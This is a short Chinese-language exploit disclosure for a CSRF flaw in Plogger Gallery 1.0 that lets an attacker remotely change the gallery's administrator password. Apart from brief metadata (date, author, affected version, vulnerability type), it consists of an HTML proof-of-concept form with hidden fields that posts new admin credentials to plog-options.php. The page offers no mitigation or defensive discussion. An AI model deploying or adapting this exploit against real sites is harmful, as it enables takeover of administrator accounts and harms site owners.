Plogger Gallery 1.0 CSRF 修改密码漏洞

时间：2010-11-20 来源：Or4nG.M4N

发布日期：2010-11.20
发布作者：Or4nG.M4N

影响版本：1.0
官方地址：http://www.plogger.org

漏洞类型：CSRF
漏洞描述：Plogger Gallery 1.0 csrf远程修改管理密码漏洞

Poc:exp

<html> <head> <title>REMOTE CSRF Change Admin Password by OR4NG.M4N</head> <body> <h1>CSRF Change Admin Password by OR4NG.M4N</h1> <form action="http://localhost/plogger/plog-admin/plog-options.php" method="post"> <table class="option-table" cellspacing="0"> <tbody><tr class="alt"> <td class="left"><label for="admin_username"></label></td> <td class="right"><input size="40" id="admin_username" name="admin_username" value="ro0t" type="hidden"></td> </tr> <tr> <td class="left"><label for="admin_email"></label></td> <td class="right"><input size="40" id="admin_email" name="admin_email" value="[email protected]" type="hidden"></td> </tr> <tr class="alt"> <td class="left"><label for="admin_password"></label></td> <td class="right"><input size="40" id="admin_password" name="admin_password" value="ro0t" type="hidden"></td> <tr> <td class="left"><label for="confirm_admin_password"></label></td> <td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="ro0t" type="hidden"></td> </tr> </tbody></table> <td class="right"><input class="submit" name="submit" value="Change FuCKeD" type="submit"></td>

标签分类：

相关阅读更多 +